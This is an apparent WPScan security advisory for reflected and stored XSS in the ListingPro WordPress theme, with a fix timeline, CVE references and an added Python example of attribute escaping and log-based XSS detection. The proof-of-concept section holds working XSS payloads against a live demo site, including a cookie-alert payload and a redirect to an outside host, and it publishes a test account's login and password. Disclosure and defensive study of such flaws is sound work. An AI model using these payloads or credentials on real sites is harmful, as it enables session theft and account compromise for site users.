ListingPro <= 2.0.14.2 - Reflected & Persistent XSS

Description
Reflected & Persistent XSS was discovered in the «ListingPro - WordPress Directory Theme». Current version is 2.0.14.2 (August 9th 2019).

Edit (WPScanTeam):
November 29th, 2019 - Envato Informed
November 29th, 2019 - Envato Investigating
December 4th, 2019 - v2.0.14.3 Released, fixing the reflected XSS but not the stored one. Envato notified again.
December 5th, 2019 - v2.0.14.4 released, stored XSS still present.
December 5th, 2019 - Envato Confirmed Stored XSS still present.
December 12th, 2019 - v2.0.14.5 released, fixing the stored XSS.
Proof of Concept
----[]- Reflected XSS: -[]----
Use your payload inside the «What» input field on the homepage ( https://classic.listingprowp.com/ ) and then submit the form — payload will be triggered.

Payload Sample #0: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
Payload Sample #1: "><img src=x onerror=alert(`SUBVΞRSΛ`)>

PoC Link: https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat=&s=home&post_type=listing


----[]- Persistent XSS: -[]----
You need a new basic user account (register your own or use mine: kadajik5554913/hYWeOJdr5Mqe), then go to the https://classic.listingprowp.com/submit-listing/ page to submit a new listing. Choose the «Free» plan and press the «Continue» button. On the next page, choose any category; after that you'll see the vulnerable input fields: «Best Day/Night» and «Good For» (for some categories you'll see only one vulnerable input field, «Good For»). Use your payload inside the vulnerable input field(s) and save your listing.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><img src=x onerror=window.location.replace(`http://defcon.su`)>

PoC: log in as kadajik5554913/hYWeOJdr5Mqe (login/password) and go to the https://classic.listingprowp.com/?post_type=listing&p=18417 page.
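Both issues above are the same defect seen from two sides: user-supplied text (the «What» search value reflected through the `select` query parameter, and the stored «Best Day/Night» / «Good For» listing fields) is written into an HTML attribute without attribute-context escaping. The Python below is an added illustration, not code from the ListingPro theme or from WPScan: it contrasts the unescaped attribute rendering with the escaped form (the Python equivalent of WordPress's `esc_attr()`), and runs a small detector over constructed access-log lines that flags requests whose decoded query parameters carry markup. The function names, the log lines and the payload string are all constructed for this example.

```python
"""Attribute-context escaping and a reflected-XSS log detector (added example)."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed payload with the same shape as the advisory's samples: it closes the
# value="" attribute, then opens a new tag with an event handler.
PAYLOAD = '"><img src=x onerror=alert(1)>'


def render_search_box_unescaped(what: str) -> str:
    """Vulnerable pattern: the search value is concatenated straight into value=""."""
    return f'<input name="select" value="{what}">'


def render_search_box_escaped(what: str) -> str:
    """Hardened pattern: escape for the attribute context before emitting.

    html.escape(quote=True) turns " ' < > & into entities, so the value can never
    terminate the attribute or start a tag. The same call belongs on the stored
    listing fields at render time; storing the raw text is fine, emitting it is not.
    """
    return f'<input name="select" value="{html.escape(what, quote=True)}">'


# Common Log Format line: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) \S+'
)

# Heuristic for markup in a decoded parameter: a tag opener, an on*= handler,
# or a javascript: URL. Deliberately broad; tune for the site's real parameters.
SUSPICIOUS = re.compile(r'<\s*[a-z]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)

# Constructed sample log: one reflected-XSS probe against the search form and
# one ordinary search. Nothing here is taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Nov/2019:10:00:00 +0000] '
    '"GET /?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&s=home&post_type=listing HTTP/1.1" 200 5123',
    '198.51.100.7 - - [29/Nov/2019:10:00:05 +0000] '
    '"GET /?select=coffee+shop&s=home&post_type=listing HTTP/1.1" 200 4870',
]


def flag_xss_in_log(lines):
    """Return (parameter, decoded value) pairs whose query values contain markup.

    parse_qs percent-decodes and turns '+' into spaces, so the check runs on what
    the server-side template would actually have echoed. A double-encoded value
    would survive one decode; decode again and re-check if that matters for you.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not CLF
        query = urlsplit(m.group("path")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if SUSPICIOUS.search(value):
                    hits.append((name, value))
    return hits


if __name__ == "__main__":
    print(render_search_box_unescaped(PAYLOAD))  # attribute broken, new tag injected
    print(render_search_box_escaped(PAYLOAD))    # inert entity-encoded text
    for param, value in flag_xss_in_log(SAMPLE_LOG):
        print(f"flagged parameter {param!r}: {value!r}")
```

The escaped renderer is the fix the theme needed in both places; the log detector is for finding probes against an unpatched site in retrospect, and will also flag harmless searches that happen to contain `<b>`-style text, so treat its output as a triage list rather than an alert.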

Affects Theme

fixed in version 2.0.14.5

References

CVE-2019-19540
CVE-2019-19541
CVE-2019-19542
URL https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher SUBVΞRSΛ
Submitter SUBVΞRSΛ
Views 118123
Verified No
WPVDB ID 9974

Timeline

Publicly Published 2019-11-29
Added 2019-12-13
Last Updated 2019-12-27
